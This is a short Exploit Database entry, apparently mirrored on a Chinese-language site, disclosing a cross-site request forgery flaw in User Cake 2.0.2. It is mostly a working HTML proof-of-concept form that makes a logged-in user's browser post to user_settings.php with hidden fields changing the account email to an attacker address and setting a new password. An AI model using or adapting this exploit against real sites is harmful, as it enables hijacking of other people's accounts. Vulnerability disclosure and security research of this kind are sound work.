User Cake – Cross-Site Request Forgery

• Exploit Database
• 16 阅读

• 作者： Dolev Farhi
  日期： 2014-05-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39198/

• source: https://www.securityfocus.com/bid/67604/info
  
  User Cake is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
  
  An attacker can exploit this issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
  
  User Cake 2.0.2 is vulnerable; prior versions may also be affected. 
  
  <html>
  <! -- CSRF Example for userCake -->
  <div align="center">
  <pre>
  
  <h2><b>		 userCake CSRF Proof of concept			<b></h2>
  
  <h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4>
  <body>
  <form
  action="http://usercake.com/user_settings.php"
  method="POST">
  Enter <u>CSRFTest</u> user account password to continue...
  
  
   Username: <b>CSRFTest</b>
   Password: <input type="password" name="password" size="10" required>
  <input type="hidden" name="email" value="attacker@email.com" />
  <input type="hidden" name="passwordc" value="HelloWorld" />
  <input type="hidden" name="passwordcheck" value="HelloWorld" />
  <input type="submit" name="submit" value="Submit" />
  
  
  
  	</form>
  	</body>
  
  </div>
  </html>